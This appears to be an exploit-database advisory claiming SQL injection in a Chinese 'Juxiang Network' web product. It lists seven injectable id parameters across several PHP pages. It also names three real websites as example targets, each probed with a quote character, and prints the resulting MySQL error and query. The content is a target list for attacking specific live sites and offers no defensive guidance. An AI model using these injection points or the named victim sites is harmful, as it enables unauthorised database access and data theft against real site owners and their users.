########################################################

# Exploit Title :  Technical Support Juxiang Network China 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepages/Owners : dedaogame.com / radiantviewer.com /
feesee.com / d58.net / linkedin.com/in/juxiang-jin-77131546 /
shop1369760423327.1688.com
# Tested On : Windows
# Exploit Risk : Medium
# Version Information : 1.0
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements
 used in an SQL Command ('SQL Injection') ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050311

########################################################

China Hangzhou City Technical Technology

Support Juxiang Network SQL Injection Vulnerability

########################################################

# Exploit : /?id=[SQL Injection]
# Exploit : /en/list.php?id=[SQL Injection]
# Exploit : /en/img_anis.php?id=[SQL Injection]
# Exploit : /en/message.php?id=[SQL Injection]
# Exploit : /en/aboutus.php?id=[SQL Injection]
# Exploit : /contents.php?id=2&cid=[SQL Injection]
# Exploit : /message.php?id=[SQL Injection]

########################################################

# Example Site =>  hzjkang.com/en/aboutus.php?id=1%27

=> [ Proof of Concept for SQL Injection ] => archive.is/67pRx

# Example Site =>  atk-china.com/aboutus.php?id=1%27

 => [ Proof of Concept for SQL Injection ] => archive.is/YtoHD

# Example Site =>  hszxrz.com/aboutus.php?id=1%27

=> [ Proof of Concept for SQL Injection ] => archive.is/3GHK6

########################################################

# SQL Database Error =>

PHPMyWind MySql Errori1/4

/aboutus.php
You have an error in your SQL syntax; check the manual that corresponds

to your MySQL server version for the right syntax to use near '\'' at line
1

Error sql: SELECT * FROM `hzjx_infoclass` where id=1\'

########################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
########################################################